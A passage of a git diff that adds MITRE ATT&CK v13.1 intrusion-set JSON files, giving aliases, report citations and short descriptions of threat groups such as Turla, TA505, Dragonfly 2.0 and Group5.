+ "url": "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
+ "description": "Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021."
+ },
+ {
+ "source_name": "CISA AA21-200A APT40 July 2021",
+ "url": "https://us-cert.cisa.gov/ncas/alerts/aa21-200a",
+ "description": "CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory \u2013 Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China\u2019s MSS Hainan State Security Department. Retrieved August 12, 2021."
+ },
+ {
+ "source_name": "APT40",
+ "description": "FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)"
+ },
+ {
+ "source_name": "FireEye Periscope March 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018."
+ },
+ {
+ "source_name": "FireEye APT40 March 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html",
+ "description": "Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019."
+ },
+ {
+ "source_name": "SecureWorks BRONZE MOHAWK n.d.",
+ "url": "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "description": "SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)",
+ "modified": "2022-04-15T15:15:51.198Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Leviathan",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40.json
new file mode 100644
index 0000000000000000000000000000000000000000..83e9fd43d276c039a035ecac0a2bc5f5c25d5337
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40.json
@@ -0,0 +1,43 @@
+{
+ "type": "bundle",
+ "id": "bundle--919de3ad-e285-496f-889e-f292d9af934d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "Group5"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40",
+ "type": "intrusion-set",
+ "created": "2017-05-31T21:32:08.304Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "G0043",
+ "url": "https://attack.mitre.org/groups/G0043",
+ "source_name": "mitre-attack"
+ },
+ {
+ "source_name": "Group5",
+ "description": "(Citation: Citizen Lab Group5)"
+ },
+ {
+ "url": "https://citizenlab.ca/2016/08/group5-syria/",
+ "description": "Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.",
+ "source_name": "Citizen Lab Group5"
+ }
+ ],
+ "modified": "2020-03-30T19:07:39.812Z",
+ "name": "Group5",
+ "description": "[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)",
+ "x_mitre_version": "1.2",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee.json
new file mode 100644
index 0000000000000000000000000000000000000000..7790bb919c7fb61e344e27dd6c6dda8cccead0dd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee.json
@@ -0,0 +1,42 @@
+{
+ "type": "bundle",
+ "id": "bundle--e0557666-0261-42b2-a8ea-cc3733505270",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "Blue Mockingbird"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "type": "intrusion-set",
+ "created": "2020-05-26T20:09:39.139Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "G0108",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0108"
+ },
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "modified": "2021-10-12T21:46:13.007Z",
+ "name": "Blue Mockingbird",
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)",
+ "x_mitre_version": "1.1",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb.json
new file mode 100644
index 0000000000000000000000000000000000000000..050ace1bcdc9ba1b7e59d5579ce013c42e3f854a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb.json
@@ -0,0 +1,48 @@
+{
+ "type": "bundle",
+ "id": "bundle--4992f76f-6697-426f-b00e-d6b86ae4ceb5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "SilverTerrier"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb",
+ "type": "intrusion-set",
+ "created": "2019-01-29T21:36:59.793Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "G0083",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0083"
+ },
+ {
+ "source_name": "SilverTerrier",
+ "description": "(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)"
+ },
+ {
+ "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.",
+ "url": "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise",
+ "source_name": "Unit42 SilverTerrier 2018"
+ },
+ {
+ "description": "Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.",
+ "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf",
+ "source_name": "Unit42 SilverTerrier 2016"
+ }
+ ],
+ "modified": "2020-05-19T23:26:11.780Z",
+ "name": "SilverTerrier",
+ "description": "[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. 
[SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)",
+ "x_mitre_version": "1.1",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json
new file mode 100644
index 0000000000000000000000000000000000000000..a9d8ace2f910ffb1296de99fbf57b432d58ddc44
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json
@@ -0,0 +1,87 @@
+{
+ "type": "bundle",
+ "id": "bundle--ba68a178-ca9f-47e8-9cfd-8f345a0fc29f",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "Dragonfly 2.0",
+ "IRON LIBERTY",
+ "DYMALLOY",
+ "Berserk Bear"
+ ],
+ "x_mitre_domains": [
+ "ics-attack",
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "intrusion-set",
+ "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_version": "2.1",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "G0074",
+ "url": "https://attack.mitre.org/groups/G0074"
+ },
+ {
+ "source_name": "DYMALLOY",
+ "description": "(Citation: Dragos DYMALLOY )"
+ },
+ {
+ "source_name": "Berserk Bear",
+ "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)"
+ },
+ {
+ "source_name": "IRON LIBERTY",
+ "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)"
+ },
+ {
+ "source_name": "Dragonfly 2.0",
+ "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)"
+ },
+ {
+ "source_name": "Dragos DYMALLOY ",
+ "url": "https://www.dragos.com/threat/dymalloy/",
+ "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020."
+ },
+ {
+ "source_name": "Fortune Dragonfly 2.0 Sept 2017",
+ "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/",
+ "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018."
+ },
+ {
+ "source_name": "Secureworks MCMD July 2019",
+ "url": "https://www.secureworks.com/research/mcmd-malware-analysis",
+ "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020."
+ },
+ {
+ "source_name": "Secureworks IRON LIBERTY",
+ "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty",
+ "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020."
+ },
+ {
+ "source_name": "Symantec Dragonfly Sept 2017",
+ "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017."
+ },
+ {
+ "source_name": "US-CERT TA18-074A",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A",
+ "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": true,
+ "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )",
+ "modified": "2022-05-11T14:00:00.188Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Dragonfly 2.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70.json
new file mode 100644
index 0000000000000000000000000000000000000000..47204639b7d1e17889d8a014d6081bed8c758b23
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70.json
@@ -0,0 +1,44 @@
+{
+ "type": "bundle",
+ "id": "bundle--7feb6c74-adfb-4fb1-8c58-120bf4eaa579",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "Stolen Pencil"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70",
+ "type": "intrusion-set",
+ "created": "2019-02-05T17:56:55.233Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": true,
+ "external_references": [
+ {
+ "external_id": "G0086",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0086"
+ },
+ {
+ "source_name": "Stolen Pencil",
+ "description": "(Citation: Netscout Stolen Pencil Dec 2018)"
+ },
+ {
+ "source_name": "Netscout Stolen Pencil Dec 2018",
+ "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/",
+ "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019."
+ }
+ ],
+ "modified": "2021-10-07T12:21:31.309Z",
+ "name": "Stolen Pencil",
+ "description": "[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)",
+ "x_mitre_version": "1.1",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6.json
new file mode 100644
index 0000000000000000000000000000000000000000..5e1fa6b5ed46fa1a54432f6c56b0115c4c9ce474
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6.json
@@ -0,0 +1,140 @@
+{
+ "type": "bundle",
+ "id": "bundle--9528ba74-8341-4f26-9db7-8b14cdafa5b1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-22T05:41:28.428Z",
+ "name": "Turla",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)\u2019s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)",
+ "aliases": [
+ "Turla",
+ "IRON HUNTER",
+ "Group 88",
+ "Belugasturgeon",
+ "Waterbug",
+ "WhiteBear",
+ "Snake",
+ "Krypton",
+ "Venomous Bear"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "3.1",
+ "x_mitre_contributors": [
+ "Matthieu Faou, ESET",
+ "Edward Millington"
+ ],
+ "type": "intrusion-set",
+ "id": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "created": "2017-05-31T21:31:49.816Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0010",
+ "external_id": "G0010"
+ },
+ {
+ "source_name": "Belugasturgeon",
+ "description": "(Citation: Accenture HyperStack October 2020)"
+ },
+ {
+ "source_name": "Krypton",
+ "description": "(Citation: CrowdStrike VENOMOUS BEAR)"
+ },
+ {
+ "source_name": "Snake",
+ "description": "(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos 
TinyTurla September 2021)"
+ },
+ {
+ "source_name": "Venomous Bear",
+ "description": "(Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021)"
+ },
+ {
+ "source_name": "Turla",
+ "description": "(Citation: Kaspersky Turla)"
+ },
+ {
+ "source_name": "Group 88",
+ "description": "(Citation: Leonardo Turla Penquin May 2020)"
+ },
+ {
+ "source_name": "IRON HUNTER",
+ "description": "(Citation: Secureworks IRON HUNTER Profile)"
+ },
+ {
+ "source_name": "Accenture HyperStack October 2020",
+ "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.",
+ "url": "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity"
+ },
+ {
+ "source_name": "Waterbug",
+ "description": "Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug)"
+ },
+ {
+ "source_name": "Talos TinyTurla September 2021",
+ "description": "Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.",
+ "url": "https://blog.talosintelligence.com/2021/09/tinyturla.html"
+ },
+ {
+ "source_name": "ESET Turla Mosquito Jan 2018",
+ "description": "ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+ },
+ {
+ "source_name": "ESET Gazer Aug 2017",
+ "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. 
Retrieved June 14, 2019.",
+ "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/"
+ },
+ {
+ "source_name": "Securelist WhiteBear Aug 2017",
+ "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.",
+ "url": "https://securelist.com/introducing-whitebear/81638/"
+ },
+ {
+ "source_name": "Kaspersky Turla",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
+ "url": "https://securelist.com/the-epic-turla-operation/65545/"
+ },
+ {
+ "source_name": "Leonardo Turla Penquin May 2020",
+ "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.",
+ "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf"
+ },
+ {
+ "source_name": "CrowdStrike VENOMOUS BEAR",
+ "description": "Meyers, A. (2018, March 12). Meet CrowdStrike\u2019s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.",
+ "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/"
+ },
+ {
+ "source_name": "Secureworks IRON HUNTER Profile",
+ "description": "Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.",
+ "url": "http://www.secureworks.com/research/threat-profiles/iron-hunter"
+ },
+ {
+ "source_name": "Symantec Waterbug",
+ "description": "Symantec. (2015, January 26). The Waterbug attack group. 
Retrieved April 10, 2015.",
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
+ },
+ {
+ "source_name": "WhiteBear",
+ "description": "WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446.json
new file mode 100644
index 0000000000000000000000000000000000000000..2021760c0b3ccf2e20efa61848d657f2a902d8ec
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446.json
@@ -0,0 +1,43 @@
+{
+ "type": "bundle",
+ "id": "bundle--e040195a-8a2b-483b-bd31-794e915ed8fa",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "Poseidon Group"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446",
+ "type": "intrusion-set",
+ "created": "2017-05-31T21:32:04.179Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0033",
+ "external_id": "G0033"
+ },
+ {
+ "source_name": "Poseidon Group",
+ "description": "(Citation: Kaspersky Poseidon Group)"
+ },
+ {
+ "url": "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.",
+ "source_name": "Kaspersky Poseidon Group"
+ }
+ ],
+ "modified": "2020-03-18T20:25:54.945Z",
+ "name": "Poseidon Group",
+ "description": "[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)",
+ "x_mitre_version": "1.1",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d.json
new file mode 100644
index 0000000000000000000000000000000000000000..754b0dfc966793119e92d6ea6d064d7e53eba983
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d.json
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--5cca235d-0516-4380-9c07-3b35b1a67598", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:38:20.381Z", + "name": "TA505", + "description": "[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)", + "aliases": [ + "TA505", + "Hive0065" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "type": "intrusion-set", + "id": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d", + "created": "2019-05-28T15:54:17.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0092", + "external_id": "G0092" + }, + { + "source_name": "Hive0065", + "description": "(Citation: IBM TA505 April 2020)" + }, + { + "source_name": "Korean FSI TA505 2020", + "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.", + "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=" + }, + { + "source_name": "IBM TA505 April 2020", + "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. 
Retrieved May 29, 2020.", + "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" + }, + { + "source_name": "Proofpoint TA505 Sep 2017", + "description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter" + }, + { + "source_name": "Proofpoint TA505 June 2018", + "description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times" + }, + { + "source_name": "Proofpoint TA505 Jan 2019", + "description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505" + }, + { + "source_name": "NCC Group TA505", + "description": "Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.", + "url": "https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline 